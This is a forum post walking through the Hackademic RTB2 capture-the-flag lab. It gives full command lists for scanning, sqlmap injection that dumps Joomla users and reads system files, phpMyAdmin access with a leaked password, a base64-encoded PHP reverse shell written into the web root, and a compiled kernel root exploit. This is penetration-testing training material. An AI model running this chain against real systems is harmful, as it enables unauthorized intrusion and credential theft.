Re: [Video] Hackademic RTB2
"PHPMyAdmin" is a web based GUI interface to manage MySQL databases, which the attacker discovers is running on one of the web services. Using the credentials gathered from the configuration file, the attacker is able to login as the database administrator. The attacker crafts an SQL query to attempt to write a PHP file into the root web folder and then access it using firefox. The result being the attacker is able to write files and execute PHP commands.
To be able to remotely interactive with the target, the attacker chooses to use "PHP-pentest-monkey" shell. The attacker creates a clone copy to work on and edits the file with their IP address as the shell will be remotely connecting back to them (and the shell needs to know where the attacker is), altering the port as well as removing the start & end PHP statements as they will already be in place. Upon updating the file, the attacker encodes the shell using base64 via "msfvenom" as this will not affect the SQL statement which will be used to create the file. Before triggering the web shell, the attacker uses netcat again to listen on the same port used in the web shell. Once everything is in place, the attacker calls the web shell, causing the target to execute the PHP function to decode the backdoor, making a connection back to the attacker. This gives the attacker command line access to the target with the same permission as the web server.
The attacker wishes to gain deeper access into the system by escaping privileges. To do so one common method is by exploiting the kernel (this ONLY works if it is the 'correct' version!). The attacker finds the target's kernel version, searches their local copy of a public exploit database "exploit-db" and discovers a potential exploit which matches the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' at the top of the file as it would stop the file compiling (it is common with exploits to have 'shout outs' here), copies a version to their local web root folder and gives permission to the file to make sure every user has access to the file. After everything is ready the attacker then starts a web server.
Controlling the target the attacker is able to locate a folder which they have permission to write to and execute files from. Afterwards they instruct the target to download the exploit code from the attacker and compile it. Upon execution the attacker has now got root access on the target's machine.
When they explore root's personal home folder, they notice the "key" file. The attacker notices the text file extension and views the content, upon doing so; they see the message has been encoded. Due to the use of "=" at the end of the message, it is a common sign that base64 has been used. The attacker pastes the message back into burp and decodes it. Seeing the mention of "png", hints the decoded value is an image file. After using the web site "opinionatedgeek.com", to decode and download the file, the attacker checks the file signature. It appears to be a valid png file format and opens it up to reveal the 'flag/proof', indicating the end goal.
netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112 # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX
echo "<binary>" | sed "s/ /;\&#/g;s/ //g;s/^/&#/;s/$/;/" # Somehow its do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
nc -z 192.168.0.112 $x
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666 -> List of content items...
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/ # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
nano +w bd.php # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
##ls -lahR /home
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
ls -lah /
gcc root.c -o root
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
// Burp -> Decoder -> Base64
#Joomla: 1.5.22 # User: Administrator
- When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
- Some mistakes in the video are more obvious.
- Instead of using "PHP-Reverse-Shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
- It is worth downloading Joomla to be familiar with a default configuration.
- The target uses DHCP to obtain an IP address.
- The selection area to record was not in align when I recorded it
Song(s): Martin Solveig & Dragonette - Hello & Klaas meets Haddaway - What is love (Klaas Radio Edit) & Scotty - The Black Pearl (Dave Darell Radio Edit) & Trent Reznor & Atticus Ross - In the Hall of the Mountain King (The Social Network) & Charlie Clouser - The Final Zepp
Video length: 13:47
Capture length: 64:30
Blog Post: http://g0tmi1k.blogspot.com/2012/01/...emic-rtb2.html
Forum Post: http://www.backtrack-linux.org/forum...l=1#post211962